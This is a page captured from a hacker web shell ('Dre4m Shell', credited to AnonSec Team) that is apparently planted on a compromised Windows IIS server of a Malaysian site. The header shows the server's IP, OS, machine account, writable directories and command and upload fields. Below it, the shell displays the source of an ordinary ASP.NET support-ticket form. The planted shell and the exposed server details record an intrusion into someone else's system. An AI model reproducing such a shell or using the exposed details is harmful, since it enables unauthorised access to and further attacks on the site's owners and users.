Dre4m Shell
Server IP : 103.6.199.200  /  Your IP : 3.135.219.153
Web Server : Microsoft-IIS/10.0
System : Windows NT EMPUSA 10.0 build 20348 (Windows Server 2016) i586
User : EMPUSA$ ( 0)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Domains/iscommy2/pbs.i-3s.com.my/wwwroot_bak/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/Domains/iscommy2/pbs.i-3s.com.my/wwwroot_bak/CustSrvcNewTicket.aspx
<%@ Page Title="" Language="C#" MasterPageFile="~/Site.Master" AutoEventWireup="true" CodeBehind="CustSrvcNewTicket.aspx.cs" Inherits="PBSI3S.CustSrvcNewTicket" %>
<asp:Content ID="Content1" ContentPlaceHolderID="MainContent" runat="server">
    <script src="<%=ResolveUrl("~/PageJS/CustSrvcNewTicket.js") %>" type="text/javascript"></script>
    <script src="<%=ResolveUrl("~/PageJS/Lookup.js") %>" type="text/javascript"></script>
    <%--delete modal--%>
    <div class="modal fade" id="mdDelete" tabindex="-1" role="dialog">
        <div class="modal-dialog" role="document">
            <div class="modal-content">
                <div class="modal-header">
                    <h4 class="modal-title" id="defaultModalLabel"><span id="mdTitle"></span></h4>
                </div>
                <div class="modal-body">
                    <span id="mdBody"></span><b><span id="mdObject"></span></b>
                </div>
                <div class="modal-footer">
                    <button type="button" class="btn btn-link waves-effect" id="btnYesDelete">Yes</button>
                    <button type="button" class="btn btn-link waves-effect" data-dismiss="modal">No</button>
                </div>
            </div>
        </div>
    </div>
    <div class="block-header">
        <ol class="breadcrumb breadcrumb-bg-orange">
            <li><a href="javascript:void(0);">Customer Service</a></li>
            <li class="active">New Support Ticket</li>
        </ol>
    </div>
        <!-- Table -->
    <div class="row clearfix" id="MainTicket">
                <div class="col-lg-12 col-md-12 col-sm-12 col-xs-12">
                    <div class="card">
                        <div class="header">
                            <h2>
                                Table Support Ticket Listings
                            </h2>
                            <ul class="header-dropdown m-r--5">
                                <li class="dropdown">
                                    <a href="javascript:void(0);" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">
                                        <i class="material-icons">more_vert</i>
                                    </a>
                                    <ul class="dropdown-menu pull-right">
                                        <li><a href="javascript:void(0);" id="btnNewTicket">New Support Ticket</a></li>
                                    </ul>
                                </li>
                            </ul>
                        </div>
                        <div class="body">
                            <div class="table-responsive">
                                <table id="TblTicket" class="table table-bordered table-striped table-hover js-basic-example dataTable">
                                    <thead>
                                        <tr>
                                            <th width="10%">Ticket #</th>
                                             <th>Report By</th>
                                            <th>Subject</th>
                                            <th>Priority Type</th>
                                            <th>Ticket Status</th>
                                            <th>Create By</th>
                                            <th>Action</th>
                                        </tr>
                                    </thead>
                                    <tbody>
                                    </tbody>
                                </table>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <!-- Forms Layout -->
            <div class="row clearfix" id="FormTicket" style="display:none">
                <div class="col-lg-12 col-md-12 col-sm-12 col-xs-12">
                    <div class="card">
                        <div class="header">
                            <h2>
                                <span id="lblTicket"></span>
                            </h2>
                        </div>
                        <div class="body">
                            <form id="form_validation">
                                <%--<h2 class="card-inside-title">
                                Card Details
                                </h2>--%>
                                <div class="row clearfix">
                                    <div class="col-lg-4">
                                        <label for="card_type">Support Category</label>
                                        <div class="form-group" id="ctnSupportCategory">
                                        </div>
                                    </div>
                                    <div class="col-lg-4">
                                        <label for="card_type">Problem Type</label>
                                        <div class="form-group" id="ctnProblemType">
                                        </div>
                                    </div>
                                    <div class="col-lg-4">
                                        <label for="card_type">Priority Type</label>
                                        <div class="form-group" id="ctnPriorityType">
                                        </div>
                                    </div>
                                </div>
                                <div class="row clearfix">
                                    <div class="col-lg-6">
                                        <label for="school_name">Report By</label>
                                        <div class="form-group">
                                            <div class="form-line">
                                                <input type="text" id="report_by" class="form-control" placeholder="Enter report by" >
                                            </div>
                                            <div class="help-info report_by" style="display:none">This field is required</div>
                                        </div>
                                    </div>
                                    <div class="row clearfix">
                                    <div class="col-lg-6">
                                        <label for="school_name">Subject</label>
                                        <div class="form-group">
                                            <div class="form-line">
                                                <input type="text" id="ticket_subject" class="form-control" placeholder="Enter subject" >
                                            </div>
                                            <div class="help-info ticket_subject" style="display:none">This field is required</div>
                                        </div>
                                    </div>
                                </div>
                                </div>
                                <div class="row clearfix">
                                    <div class="col-lg-12">
                                        <label for="school_name">Problem Description</label>
                                        <div class="form-group">
                                        <div class="form-line">
                                            <textarea rows="4" id="ticket_desc" class="form-control no-resize" placeholder="Enter problem description here..."></textarea>
                                        </div>
                                        <div class="help-info ticket_desc" style="display:none">This field is required</div>
                                    </div>
                                    </div>
                                </div>
                                <div class="row clearfix" id="rowStatus" style="display:none">
                                    <div class="col-lg-4">
                                        <label for="school_name">Create By</label>
                                        <div class="form-group">
                                            <div class="form-line">
                                                <input type="text" id="create_by" class="form-control" placeholder="Enter create by" disabled>
                                            </div>
                                            <div class="help-info create_by" style="display:none">This field is required</div>
                                        </div>
                                    </div>
                                    <div class="col-lg-4">
                                        <label for="school_name">Create At</label>
                                        <div class="form-group">
                                            <div class="form-line">
                                                <input type="text" id="create_at" class="form-control" placeholder="Enter create at" disabled>
                                            </div>
                                            <div class="help-info create_at" style="display:none">This field is required</div>
                                        </div>
                                    </div>
                                    <div class="col-lg-4">
                                        <label for="card_type">Ticket Status</label>
                                        <div class="form-group" id="ctnTicketStatus">
                                        </div>
                                    </div>
                                </div>
                                <br>
                                <div>
                                    <p style="text-align:right">
                                        <button type="button" class="btn bg-brown m-t-15 waves-effect" id="btnCloseTicket">Close</button>
                                        <button type="submit" class="btn bg-orange m-t-15 waves-effect" id="btnSaveTicket" style="display:none">Save</button>
                                        <button type="submit" class="btn bg-orange m-t-15 waves-effect" id="btnUpdateTicket" style="display:none">Update</button>
                                     </p>
                                </div>
                            </form>
                        </div>
                    </div>
                </div>
            </div>
</asp:Content>

Anon7 - 2022
AnonSec Team